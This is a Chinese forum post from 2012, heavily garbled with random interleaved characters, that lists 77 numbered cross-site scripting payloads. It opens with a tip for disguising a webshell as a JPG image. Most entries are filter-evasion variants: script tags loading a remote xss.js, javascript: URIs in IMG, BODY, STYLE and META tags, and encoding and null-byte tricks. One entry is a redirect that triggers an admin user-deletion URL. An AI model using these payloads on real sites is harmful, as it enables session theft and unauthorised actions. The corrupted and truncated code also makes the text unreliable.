跨站图片shell0 Q( b: X+ a" c
XSS跨站代码 <script>alert("")</script>
9 I2 o) z$ |% P
7 G3 I, g9 C7 h' [$ S" e9 b9 P& N将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马) E8 d6 b: a0 w4 `" l
# y$ G! @+ p4 C s' g! h
2 ]; ?) F: I3 o J/ p3 ?- j
8 i' k3 C0 u% A) \1)普通的XSS JavaScript注入+ j6 `1 ^: C/ _3 a# R7 J
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* k* w' T: Z$ `% T6 n2 B6 J
8 ]( z7 [8 Y4 C$ ~(2)IMG标签XSS使用JavaScript命令5 Q* q2 {( P2 P) D0 Y5 E
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: h0 |' R& O: p$ L; R3 @
6 N$ j2 d6 A1 U(3)IMG标签无分号无引号
& b6 r: B5 U1 D9 `6 L<IMG SRC=javascript:alert(‘XSS’)>
# b/ k# |1 S0 s' [! S. A- D1 [6 T3 l( x5 c S0 ^
(4)IMG标签大小写不敏感0 [6 j5 w% @- p5 g
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
3 h, J1 O! e/ t. U1 a" L+ c! A0 n' c# F4 R+ h6 F
(5)HTML编码(必须有分号)- P+ `7 c0 I: [2 `" Q, @7 Q
<IMG SRC=javascript:alert(“XSS”)>6 o u8 Y4 k- q0 c& e0 `
0 v# C1 O* Q9 B) I* a(6)修正缺陷IMG标签# I" y2 T3 l! i' ^1 {/ J: A9 f
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ s8 D, z! J4 g
, U# Q: p# q, L# y7 N- T* j
(7)formCharCode标签(计算器)6 {/ o. K- `" Q% Y4 }$ D
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, M5 Y6 J: Z; U( `3 T9 ^7 }2 A& X+ P- F4 o# I
(8)UTF-8的Unicode编码(计算器); F3 K7 y4 J( L4 @5 o
<IMG SRC=jav..省略..S')>* {. V/ `3 I% k' C
2 e) x6 {2 k& |5 P# E( ?- b
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)4 b# \: g- \$ v% N
<IMG SRC=jav..省略..S')># q- `" Z, P- z Z
( e/ W, f; S* ](10)十六进制编码也是没有分号(计算器)" A) ^- }9 r* v& f
<IMG SRC=java..省略..XSS')># z" U0 @4 E6 P7 r' j3 z+ Q
) ]: E" k# R+ e# r" D
(11)嵌入式标签,将Javascript分开
6 H3 G& F( c p4 _9 e! ]" }# @6 Z<IMG SRC=”jav ascript:alert(‘XSS’);”>! J8 P2 r) h( B+ b0 I# j
; w" Z) H5 e1 T8 v" Q(12)嵌入式编码标签,将Javascript分开
3 b4 T" w, p" q' v) y5 x8 @; ?<IMG SRC=”jav ascript:alert(‘XSS’);”>: ~. R1 a2 h) B# D
/ F; u2 d0 e9 s) p. ^! f(13)嵌入式换行符8 \2 x5 b4 j r% x) V" }
<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ _/ m% f1 X7 \! c' I' i5 L1 k/ A V* F7 z6 Y
(14)嵌入式回车6 D/ J1 f7 E; x9 s
<IMG SRC=”jav ascript:alert(‘XSS’);”>
k; i e3 s% X9 j1 O7 t$ [& n0 z# ?2 X# k, ~% w4 x+ I
(15)嵌入式多行注入JavaScript,这是XSS极端的例子) q, r5 z" T7 p! z
<IMG SRC=”javascript:alert(‘XSS‘)”>
0 R* j5 X7 H8 G+ w0 W
& S0 P# |$ p% x" k' w9 @(16)解决限制字符(要求同页面)9 [3 W9 E+ F( `( h
<script>z=’document.’</script>
/ h/ Q/ e! B) q<script>z=z+’write(“‘</script>
9 w) H$ f( K3 x3 Y<script>z=z+’<script’</script>* p: y" m& i$ t" R
<script>z=z+’ src=ht’</script>
( R9 J( l# R- L% k<script>z=z+’tp://ww’</script>8 q' n3 w! c& Y b6 L2 Y+ m& n
<script>z=z+’w.shell’</script>( W! g2 M6 p6 k8 z
<script>z=z+’.net/1.’</script>6 z6 D- U( L9 A& S3 T. T
<script>z=z+’js></sc’</script>( y* Z1 p& }5 a* r
<script>z=z+’ript>”)’</script>
& N+ ]) \2 h8 [- j5 J7 _! o5 M<script>eval_r(z)</script>
( g# B2 r c% c
: Q: Q F3 _1 w0 r. B& f' J" M' |(17)空字符2 v1 G8 r; E4 K% A, ^
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 v& x# B# A2 o/ b! Z" E' s
) b4 ~ `& |; w" J' t(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' h, ]9 a7 x4 o4 f1 N/ A
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# l$ I3 F% j0 H# J6 a7 X
, M+ Z8 t. U: @" T) n7 A; `& R- M(19)Spaces和meta前的IMG标签
0 b/ Z/ q- n, S2 p |* F% ]) x& F<IMG SRC=” javascript:alert(‘XSS’);”>: l" I" B9 o9 @* h7 Y$ \& [% k
/ T5 ?; T1 W7 U! D; H
(20)Non-alpha-non-digit XSS
' H/ h: g( J" h0 i<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ p, q5 }0 V" [0 F. z
; q }- q% {0 U# r1 S(21)Non-alpha-non-digit XSS to 2+ u# Z6 u1 ^0 e# H" b
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: h& N6 U8 w# t& Z1 x' U0 H$ O
^' n1 A' V) p; r(22)Non-alpha-non-digit XSS to 39 E5 r5 b6 E# I. Y z
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! H6 K3 t& [) o8 F9 V" S5 J! g6 K' L* O& i# w3 ? J/ M0 q
(23)双开括号
/ f5 O+ E& X) w- }- T<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; O2 b; R3 O9 k/ m! q& n/ M! U) ^4 c& X0 y5 k1 h
(24)无结束脚本标记(仅火狐等浏览器)# m9 Y8 Z4 f7 B l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 W" u, i, o" `
5 S/ O7 J ]5 Y2 S) `
(25)无结束脚本标记2
% h/ {" w! X% v+ i6 I( M! T" A P) U1 b<SCRIPT SRC=//3w.org/XSS/xss.js>2 E# {3 v& |# X) F: e
7 [; B2 l0 _9 t
(26)半开的HTML/JavaScript XSS, S" P% w& W6 [7 \% j
<IMG SRC=”javascript:alert(‘XSS’)”/ z! g" B2 a4 v
, {4 x0 _$ g! [3 |2 @- P+ i* s
(27)双开角括号
4 r" \. Y6 `! `. V# h3 ?8 K$ }<iframe src=http://3w.org/XSS.html <4 N7 L7 _3 _. q9 C5 H. s, Z# C- k
, [5 u, s$ Z" p: d2 B(28)无单引号 双引号 分号5 f* a1 }& o6 i, S T
<SCRIPT>a=/XSS/
9 w8 y4 u5 l4 M6 E$ ]+ Ralert(a.source)</SCRIPT>
0 t3 Q: M7 d# y8 T; x0 y2 I- }
1 h. p3 L" y \( r$ j% Z(29)换码过滤的JavaScript
7 v- x B/ ?+ l' A$ R# ]- a2 [\”;alert(‘XSS’);//" i. [* U N. K% t# {9 a3 M7 u6 E9 V
o. \5 I5 H0 _2 ?- Q. p; J: s, x(30)结束Title标签; W- X) ^2 {; r; ]" @, v
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 }8 Y& t4 T% Q- [3 }/ o9 ?8 H7 ]& Q& Z3 u0 X% {' i+ K) b
(31)Input Image
3 j5 y6 k9 n4 a; v! R/ C% a<INPUT SRC=”javascript:alert(‘XSS’);”>
& x+ e( t9 E- K7 n" F5 X) |5 V
7 X Z, V9 y1 @' P: K(32)BODY Image5 H+ N( ?7 @# W+ c1 \; L3 H
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" a0 `1 \! H7 m0 ^$ [
6 a' K0 \4 Y+ x$ w8 t- h0 a(33)BODY标签
3 B: ~0 }' A* B' ^, N( R, A<BODY(‘XSS’)>
- k% b% O. E/ }3 }4 C& }( }' }: e
* {' r0 f7 z: a& v k' l4 j! W(34)IMG Dynsrc' h3 s% V9 p5 e! u
<IMG DYNSRC=”javascript:alert(‘XSS’)”>/ A" r" n/ w3 k- w
" D+ j" N4 Q3 U* C! E(35)IMG Lowsrc
7 @' r: j: ^: Z! Y<IMG LOWSRC=”javascript:alert(‘XSS’)”>
1 @9 \( z5 G) ?- H3 t# V: w
2 [7 C. @( |- |) m8 _( q: v(36)BGSOUND
1 n7 Q- V1 o& A d6 K* R( m/ L2 a<BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ D* U4 w7 _# Q D, I
9 F: A, p5 c2 x7 ~( @2 c(37)STYLE sheet
- K* R" S/ L& x; R; h; w" @$ r0 ]# B<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 `* B& O" @: m! w' b' ?
5 W4 t3 f3 }, C" l(38)远程样式表% Y- |5 S+ H$ F
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ n4 g, Y. g, S4 ?2 d& N6 \
7 k& h. k: L+ _9 p" U# Y( e(39)List-style-image(列表式)
( Y9 c* q8 c" g% D+ }<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 a# O( e7 G8 i2 V5 J3 A6 M% F1 r; f! _3 ]
(40)IMG VBscript: l A6 A; n u/ e
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS# L, \; W7 z9 \4 ?% A0 Y7 u3 n- g
- T7 Z& }$ \8 j, l(41)META链接url$ ?/ F G- R* `
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
8 D% s8 w: S& G0 z) B/ p- m$ ~1 R: n, @1 ?/ C
(42)Iframe) ]' o% G+ q3 A
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
1 p4 P' _9 y. i6 l) x$ E$ |(43)Frame
1 l0 T& S+ M, M: X<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>) U" O; U: c# U# a4 q! ]( n5 n
: r6 q3 W Q; d* C2 j$ O
(44)Table" R. b- [- w2 R5 W' b
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' S( a% P+ k& x7 @5 u4 c; U5 w- b9 N' V r5 U& x- }# F& a
(45)TD% u8 a- P5 o5 S9 q* o; J l2 I: N
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># m7 n' O8 H% S; J, }
* T/ J* A' ^$ `" T2 U/ M3 N(46)DIV background-image; {4 F U7 _7 N/ v7 w7 l" a/ J
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! L3 F. y+ M1 [6 j8 O" z8 ]5 [3 H
/ n+ h3 C% D7 b# A4 Y1 F
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 S [: G8 `9 c3 |6 v
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
6 G) e( L0 S4 ~6 D3 E3 m3 d1 a9 S' y& w" v
(48)DIV expression. [! g& t2 R% c. ^) _+ D* d
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 }5 l" I7 q* O) H2 }; ?, d* t" }" F) q' i1 \) d! g
(49)STYLE属性分拆表达. A7 q* d/ h4 _6 s' K
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
h, j+ L @8 R. g2 c+ O! P$ m9 l: Y$ B( R; ~
(50)匿名STYLE(组成:开角号和一个字母开头)1 e# Z8 @4 B2 }7 G: _6 g# M" r
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ t- D% i) W1 q. s/ n
- @ J% d3 [* g# w(51)STYLE background-image* _) _2 O+ W% X; q- e
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
9 I K! @+ a, N" C# x9 {9 G" S, X. e. g
(52)IMG STYLE方式8 ~3 n( [. K- @
exppression(alert(“XSS”))’>
1 c k. c# r! L/ G3 A) C6 F8 J; S( A: d0 p- z9 J1 Z3 ~+ ]- a
(53)STYLE background W2 o6 ]% _( J# `
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
/ H$ W- d. Q, i/ R# a6 E' t; N1 F7 [$ C7 E9 n9 ~
(54)BASE
+ y. \$ v. G; e& J<BASE HREF=”javascript:alert(‘XSS’);//”>* [( S( A+ o2 w7 h$ Z
% R, y! L( }& n2 u
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS Z/ G- [6 N J7 P2 Z! M
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED># Y2 [! t9 i; A" S7 m* h
* R" X9 S, ]1 X(56)在flash中使用ActionScrpt可以混进你XSS的代码
5 @) Q* k& [( _a=”get”;
# V2 y' s5 I7 M' Rb=”URL(\”";4 l; l# U' n5 \/ Y5 j2 C
c=”javascript:”;
4 u: z6 W% U$ H( T4 sd=”alert(‘XSS’);\”)”;/ Y! v( j% {4 R. D# M* V
eval_r(a+b+c+d); Z7 E) S) p' R" m; C* a3 m3 I- W [
$ S* A. x2 ]% k, ?7 G+ A; p
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上* L" W9 ?6 Y" b/ Y, A
<HTML xmlns:xss>
! }# r( p! o( z<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' {6 f1 a* j |
<xss:xss>XSS</xss:xss>
) ?+ o0 O8 L0 ^/ I, p; @2 \0 n: H7 u</HTML>
! u ]+ t5 l; t5 `
6 c8 x# T# R5 D" @" M8 L(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 [4 {$ w2 d8 [* c; l<SCRIPT SRC=””></SCRIPT>1 n0 [% J. @5 b) w
9 x c* W( p1 f. P. w& [
(59)IMG嵌入式命令,可执行任意命令; l# f% m) k9 p6 f
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
0 ]9 I) ^% y, p: |$ E2 y1 {
6 j6 H$ R D4 r& w3 r(60)IMG嵌入式命令(a.jpg在同服务器)5 x* l v3 m3 D% i; R5 C
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. k' g- Z# L, U
7 y# v- {; o0 F' v1 K) `2 N6 @
(61)绕符号过滤# Y7 R+ k1 R h' g' {. s' A$ a9 K- }1 P( l
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ }7 \ K1 `! z" l* x1 l
* H2 i t( t4 S F, b2 D4 ^(62)
/ S) L6 V/ ?6 w<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( Z+ ^! \4 r( C3 q$ O7 ?9 r+ O1 V8 `, \0 x: ^) f% l4 W
(63)
( J7 I9 u9 ~0 |/ O<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: G$ W$ }9 P7 D, S* Z2 I0 J
- C/ g) y, v a, b(64)" D$ b) u1 c7 v K; |
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>1 K3 S- `5 a" N4 ]
8 ^! ?: F' O8 ?0 i$ ?
(65)
" B9 c) E8 L$ t4 Q# v9 }! W<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ ?5 m M, l& |2 i/ v2 {
* y" |& {, W9 |1 v% B
(66)5 c/ {5 R4 c" H q. Z7 A* N& s
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
: o- A0 K) [' v" @ B- o
7 |" @$ I( R- B1 J(67)
' p5 F) |( s0 p" w' }<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
& A# o$ u/ t9 F$ F2 N \+ m: j; D
7 w. y- O1 K Q(68)URL绕行" e' ~0 P; ]8 w! `$ f9 l
<A HREF=”http://127.0.0.1/”>XSS</A>5 W0 z/ y+ \+ ]$ s1 }* N
* o! [ }/ s2 K# V* N
(69)URL编码
& T' h, I- p% f, q' j<A HREF=”http://3w.org”>XSS</A>8 l4 W2 d* @4 A4 m4 Z' B
. d) t0 i" o% G5 G8 L1 E(70)IP十进制
: R1 x% J: \, `5 J+ ?<A HREF=”http://3232235521″>XSS</A>( r% x: q% @' U+ Q- Z
* v$ q2 r9 L# k$ O+ V! i(71)IP十六进制4 x0 `3 r! c/ T; `- r
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>- Y: H3 K5 |% ~9 H3 z' h/ M
. \9 p! z0 Q& F& ?$ C- @(72)IP八进制0 t/ P, d# u! v" [
<A HREF=”http://0300.0250.0000.0001″>XSS</A>- }0 M5 U; Y" T, o$ A
' C& r% f( L/ E+ G* i) W
(73)混合编码
( K8 E2 x+ V/ U/ S, z<A HREF=”h
! P' g% N3 D# G, {3 k$ Htt p://6 6.000146.0×7.147/”">XSS</A>
5 o* _/ V9 J$ |2 {! C* J" A( n& B$ p- X* i" \* A
(74)节省[http:]/ Z; l( g* u* }& b+ _! m1 }$ A
<A HREF=”//www.google.com/”>XSS</A>0 g. j$ ^% c9 c' }# I2 }" l4 q
6 `$ v u2 y, {* f3 T, |(75)节省[www]
' ]2 X) i% a! e<A HREF=”http://google.com/”>XSS</A>9 D: _4 z0 K3 j% g1 C/ \* t
% u7 G& S: W5 P( J* _) Q# a2 f
(76)绝对点绝对DNS
c u ]3 q" O7 w+ Q, g3 L' H9 _<A HREF=”http://www.google.com./”>XSS</A>
. Z1 n8 B& x4 ^$ J# \( h4 k3 j
3 l* h. R" N4 ^! f6 l% ~, k(77)javascript链接( p' s" w* N: i1 x' S* C5 L
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>, G, G# |' t% g" _4 ]9 @
|
发表于 2012-9-13 17:04:56
收藏
支持
反对